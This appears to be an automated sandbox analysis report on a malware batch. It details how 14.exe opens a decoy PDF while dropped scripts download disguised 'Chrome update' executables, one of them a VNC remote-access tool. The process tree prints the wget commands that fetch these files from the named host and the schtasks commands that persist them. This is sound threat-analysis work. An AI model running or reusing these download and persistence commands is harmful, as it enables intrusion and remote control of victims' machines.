Overview

Static: 10

Score  Sample                 Platform
10     01/2015.5.27/01.vir    windows7_x64
3      01/2015.5.27/01.vir    windows10_x64
3      PER-DCOMP-...ao.dll    windows7_x64
1      PER-DCOMP-...ao.dll    windows10_x64
1      01/2015.5.27/03.exe    windows7_x64
8      01/2015.5.27/03.exe    windows10_x64
8      01/2015.5.27/04.exe    windows7_x64
1      01/2015.5.27/04.exe    windows10_x64
1      01/2015.5.27/05.exe    windows7_x64
10     01/2015.5.27/05.exe    windows10_x64
10     01/2015.5.27/07.exe    windows7_x64
7      01/2015.5.27/07.exe    windows10_x64
7      01/2015.5.27/09.exe    windows7_x64
10     01/2015.5.27/09.exe    windows10_x64
10     01/2015.5.27/10.exe    windows7_x64
10     01/2015.5.27/10.exe    windows10_x64
10     01/2015.5.27/12.pdf    windows7_x64
1      01/2015.5.27/12.pdf    windows10_x64
1      01/2015.5.27/13.pdf    windows7_x64
1      01/2015.5.27/13.pdf    windows10_x64
1      01/2015.5.27/14.exe    windows7_x64
8      01/2015.5.27/14.exe    windows10_x64
8      01/2015.5.27/15.dll    windows7_x64
1      01/2015.5.27/15.dll    windows10_x64
1      01/2015.5.27/16.rtf    windows7_x64
10     01/2015.5.27/16.rtf    windows10_x64
1      01/2015.5.27/17.pdf    windows7_x64
1      01/2015.5.27/17.pdf    windows10_x64
1      01/2015.5.27/18.doc    windows7_x64
1      01/2015.5.27/18.doc    windows10_x64
Analysis

- max time kernel: 119s
- max time network: 159s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 28-01-2022 13:34
Behavioral tasks

Task          Sample                    Resource
behavioral1   01/2015.5.27/01.vir       win7-en-20211208
behavioral2   01/2015.5.27/01.vir       win10-en-20211208
behavioral3   PER-DCOMP-Intimacao.dll   win7-en-20211208
behavioral4   PER-DCOMP-Intimacao.dll   win10-en-20211208
behavioral5   01/2015.5.27/03.exe       win7-en-20211208
behavioral6   01/2015.5.27/03.exe       win10-en-20211208
behavioral7   01/2015.5.27/04.exe       win7-en-20211208
behavioral8   01/2015.5.27/04.exe       win10-en-20211208
behavioral9   01/2015.5.27/05.exe       win7-en-20211208
behavioral10  01/2015.5.27/05.exe       win10-en-20211208
behavioral11  01/2015.5.27/07.exe       win7-en-20211208
behavioral12  01/2015.5.27/07.exe       win10-en-20211208
behavioral13  01/2015.5.27/09.exe       win7-en-20211208
behavioral14  01/2015.5.27/09.exe       win10-en-20211208
behavioral15  01/2015.5.27/10.exe       win7-en-20211208
behavioral16  01/2015.5.27/10.exe       win10-en-20211208
behavioral17  01/2015.5.27/12.pdf       win7-en-20211208
behavioral18  01/2015.5.27/12.pdf       win10-en-20211208
behavioral19  01/2015.5.27/13.pdf       win7-en-20211208
behavioral20  01/2015.5.27/13.pdf       win10-en-20211208
behavioral21  01/2015.5.27/14.exe       win7-en-20211208
behavioral22  01/2015.5.27/14.exe       win10-en-20211208
behavioral23  01/2015.5.27/15.dll       win7-en-20211208
behavioral24  01/2015.5.27/15.dll       win10-en-20211208
behavioral25  01/2015.5.27/16.rtf       win7-en-20211208
behavioral26  01/2015.5.27/16.rtf       win10-en-20211208
behavioral27  01/2015.5.27/17.pdf       win7-en-20211208
behavioral28  01/2015.5.27/17.pdf       win10-en-20211208
behavioral29  01/2015.5.27/18.doc       win7-en-20211208
behavioral30  01/2015.5.27/18.doc       win10-en-20211208
General

- Target: 01/2015.5.27/14.exe
- Size: 821KB
- MD5: 9ed9cb3fdd2a68a25665681a94879771
- SHA1: ad957a4aca28e4ab343cd8151e9e218b39e3f595
- SHA256: 05a5bad78cdb97a78ca13bf4afa525a5294dbc9e6babb41a0861d48e76d64bcb
- SHA512: 15941df8d2dfb085e7604c3e94d4346cb59e240700dd06ceabe28d57cd471dc50ccb7448d5b9a3ac6b2642a3a09367d14819214c915ce4c069a476c43b7da223
Malware Config
Signatures

- Executes dropped EXE (4 IoCs)
  Processes:
  pid   process
  4588  getcrome.exe
  1300  wget.exe
  4252  wget.exe
  4204  wget.exe

- YARA rule match on dropped resource
  Processes:
  resource                                     yara_rule   hits
  C:\Users\Admin\AppData\Local\Temp\wget.exe   upx         4

- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

- Checks processor information in registry (2 TTPs, 2 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
  description        ioc                                                                    process
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0        AcroRd32.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz   AcroRd32.exe

- Creates scheduled task(s) (1 TTPs, 3 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  Processes:
  pid   process
  5104  schtasks.exe
  4792  schtasks.exe
  2144  schtasks.exe

- Modifies Internet Explorer settings
  Processes:
  description  ioc                                                                                                                                          process
  Key created  \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION   AcroRd32.exe

- Modifies registry class (2 IoCs)
  Processes:
  description  ioc                                                                                process
  Key created  \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings   14.exe
  Key created  \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings   getcrome.exe

- Runs ping.exe (1 TTPs, 1 IoCs)

- Suspicious behavior: EnumeratesProcesses (28 IoCs)
  Processes (repeated hits collapsed into the hits column):
  pid   process        hits
  1300  wget.exe       2
  4252  wget.exe       2
  4204  wget.exe       2
  4628  AcroRd32.exe   22

- Suspicious use of SetWindowsHookEx (6 IoCs)
  Processes:
  pid   process        hits
  4628  AcroRd32.exe   6

- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (repeated hits collapsed into the hits column):
  pid   process        target pid  target process  hits
  2616  14.exe         4628        AcroRd32.exe    3
  2616  14.exe         4588        getcrome.exe    3
  4588  getcrome.exe   1620        WScript.exe     3
  1620  WScript.exe    4968        cmd.exe         3
  4968  cmd.exe        5068        chcp.com        3
  4968  cmd.exe        1300        wget.exe        3
  4968  cmd.exe        4252        wget.exe        3
  4968  cmd.exe        4204        wget.exe        3
  4968  cmd.exe        2340        cmd.exe         3
  4968  cmd.exe        2980        find.exe        3
  4968  cmd.exe        5100        schtasks.exe    3
  4968  cmd.exe        5104        schtasks.exe    3
  4968  cmd.exe        5076        schtasks.exe    3
  4968  cmd.exe        4792        schtasks.exe    3
  4968  cmd.exe        4760        schtasks.exe    3
  4968  cmd.exe        2144        schtasks.exe    3
  4968  cmd.exe        3164        PING.EXE        3
  4628  AcroRd32.exe   4100        RdrCEF.exe      3
  4628  AcroRd32.exe   4872        RdrCEF.exe      3
  4628  AcroRd32.exe   720         RdrCEF.exe      3
  720   RdrCEF.exe     2452        RdrCEF.exe      4
Processes

Each entry gives the image path, the command line, and the signatures triggered by that process; the number in brackets is the depth in the process tree.

- [1] C:\Users\Admin\AppData\Local\Temp\01\2015.5.27\14.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\01\2015.5.27\14.exe"
  Signatures: Modifies registry class; Suspicious use of WriteProcessMemory

  - [2] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
    Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\spisok.pdf"
    Signatures: Checks processor information in registry; Modifies Internet Explorer settings; Suspicious behavior: EnumeratesProcesses; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory

    - [3] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

    - [3] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

    - [3] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
      Signatures: Suspicious use of WriteProcessMemory

      - [4] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AAA8491B831F694F647A4A0BBC4B699A --mojo-platform-channel-handle=1660 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

      - [4] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=0430AEDE0A7C4496FD9B34936C1E242F --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=0430AEDE0A7C4496FD9B34936C1E242F --renderer-client-id=2 --mojo-platform-channel-handle=1676 --allow-no-sandbox-job /prefetch:1

      - [4] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F594B7979BFBCDED06ABD4BCAD1E2CC3 --mojo-platform-channel-handle=1728 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

      - [4] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F2424DB021AEF746707CA1949D05D66B --mojo-platform-channel-handle=2044 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

      - [4] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=02B81E92D8A1815D520C3FA934D448CC --mojo-platform-channel-handle=2364 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

  - [2] C:\Users\Admin\AppData\Local\Temp\getcrome.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\getcrome.exe" -p000_
    Signatures: Executes dropped EXE; Modifies registry class; Suspicious use of WriteProcessMemory

    - [3] C:\Windows\SysWOW64\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getchrome.vbs"
      Signatures: Suspicious use of WriteProcessMemory

      - [4] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c getchrome.cmd
        Signatures: Suspicious use of WriteProcessMemory

        - [5] C:\Windows\SysWOW64\chcp.com
          Command line: chcp 1251

        - [5] C:\Users\Admin\AppData\Local\Temp\wget.exe
          Command line: wget.exe http://xiaomi-mi.com.ua/images/logo/chrome-xvnc-v5517.exe
          Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses

        - [5] C:\Users\Admin\AppData\Local\Temp\wget.exe
          Command line: wget.exe http://xiaomi-mi.com.ua/images/logo/chromeupdates.exe
          Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses

        - [5] C:\Users\Admin\AppData\Local\Temp\wget.exe
          Command line: wget.exe http://xiaomi-mi.com.ua/images/logo/updatesexplorer.exe
          Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses

        - [5] C:\Windows\SysWOW64\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /S /D /c" ver "

        - [5] C:\Windows\SysWOW64\find.exe
          Command line: find "Microsoft Windows XP"

        - [5] C:\Windows\SysWOW64\schtasks.exe
          Command line: schtasks /Delete /tn ChromeUpdates_vnc /f

        - [5] C:\Windows\SysWOW64\schtasks.exe
          Command line: schtasks /Create /tn ChromeUpdates_vnc /TR "C:\Users\Admin\AppData\Roaming"\ChromeUpdates\chrome-xvnc-v5517.exe /SC MINUTE /mo 240
          Signatures: Creates scheduled task(s)

        - [5] C:\Windows\SysWOW64\schtasks.exe
          Command line: schtasks /Delete /tn ChromeUpdates_ups /f

        - [5] C:\Windows\SysWOW64\schtasks.exe
          Command line: schtasks /Create /tn ChromeUpdates_ups /TR "C:\Users\Admin\AppData\Roaming"\ChromeUpdates\chromeupdates.exe /SC MINUTE /mo 60
          Signatures: Creates scheduled task(s)

        - [5] C:\Windows\SysWOW64\schtasks.exe
          Command line: schtasks /Delete /tn ChromeUpdates_exp /f

        - [5] C:\Windows\SysWOW64\schtasks.exe
          Command line: schtasks /Create /tn ChromeUpdates_exp /TR "C:\Users\Admin\AppData\Roaming"\ChromeUpdates\updatesexplorer.exe /SC MINUTE /mo 10
          Signatures: Creates scheduled task(s)

        - [5] C:\Windows\SysWOW64\PING.EXE
          Command line: ping 127.0.0.1
          Signatures: Runs ping.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\getchrome.cmd
- C:\Users\Admin\AppData\Local\Temp\getchrome.vbs
- C:\Users\Admin\AppData\Local\Temp\getcrome.exe
- C:\Users\Admin\AppData\Local\Temp\spisok.pdf
- C:\Users\Admin\AppData\Local\Temp\wget.exe
- memory/1136-217-0x0000000077E12000-0x0000000077E13000-memory.dmp (Filesize 4KB)
- memory/2388-228-0x0000000077E12000-0x0000000077E13000-memory.dmp (Filesize 4KB)
- memory/2452-214-0x0000000077E12000-0x0000000077E13000-memory.dmp (Filesize 4KB)
- memory/3084-222-0x0000000077E12000-0x0000000077E13000-memory.dmp (Filesize 4KB)
- memory/3596-225-0x0000000077E12000-0x0000000077E13000-memory.dmp (Filesize 4KB)